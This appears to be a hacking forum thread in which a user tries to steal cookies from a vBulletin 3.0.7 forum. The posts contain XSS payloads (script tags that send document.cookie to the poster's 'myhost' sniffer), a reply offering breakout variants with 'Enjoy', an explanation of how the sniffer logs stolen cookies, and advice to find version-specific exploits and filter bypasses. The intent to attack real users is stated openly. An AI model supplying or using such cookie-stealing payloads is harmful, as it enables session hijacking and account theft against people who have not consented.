Hi guyz I uploaded my own sniffer to my host and I did all the settings , I posted these codes to steal cookie <a href="http://myhost/s.jpg?it is test">click me</a> and <img src="http:/myhost/s.jpg"> and <script>img = new Image(); img.src = "http://myhost/s.jpg?"+document.cookie;</script> I posted above codes to my target forum but they worked like text I mean they did not work where should I write these codes to work ,My target forum's html codes are off. Which codes should I use to steal cookie? Above codes do not work why? Thanxx
To steal cookies you should use this codes (try them all): Code: '><script>img=new Image();img.src="http:/myhost/s.jpg.?"+document.cookie;"+document.cookie;</script> Code: '><script src=http:/myhost/s.jpg></script> Enjoy
this <a href="http://myhost/s.jpg?it is test">click me</a> and this <img src="http:/myhost/s.jpg"> is not a cookie stealing codes. because cookie stealers use JAVA scripts. The Cookies cames to haker in QUERY STRING. in http://bbs.com/news.php?news_id=6&print=on query string is "news_id=6&print=on". The cookie sniffer SAVE all query strings that connect to him. IF user's cookie is user=Mike;password=xxx JAVA script replace +document.cookie in for real cookies from user's browser and connect to http://www.gfdfdgdfg.com/sniffer.php?user=Mike;password=xxx browser think that it is a image, but don't display it. YOU SEE. QUERY_STRING is ?user=Mike;password=xxx it will be saved by your SNIFFER http://www.gfdfdgdfg.com/sniffer.php Sorry for bad, bad English.
Where should I write these codes if ı post them as an answer for a topic, they work like a text ,cookies do not reach to my sniffer??
http://www.forum.antichat.ru/thread20140.html Read this text and if you have any questions just write them here.
You must know the version of that forum. Those codes won't work. You should find a ready-made exploit for the version of that forum, edit it and write the address of your sniffer. Or learn to find some bugs to by-pass different filters.
Forum ı am trying to steal cookie is vBulletin Version 3.0.7 I tried some exploits in general but do you suggest any special and there is no filters for codes , ı just think ı make something wrong in somewhere but where